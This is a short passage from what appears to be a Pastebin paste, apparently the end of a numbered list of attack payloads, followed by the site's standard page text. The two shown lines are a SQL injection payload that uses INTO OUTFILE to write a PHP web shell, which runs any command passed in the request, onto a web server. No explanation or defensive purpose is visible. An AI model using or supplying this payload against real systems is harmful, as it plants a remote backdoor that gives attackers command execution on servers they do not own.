  709. SELECT “<? system($_REQUEST['cmd']); ?>”
  710. INTO OUTFILE “full/path/here/cmd.php”
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!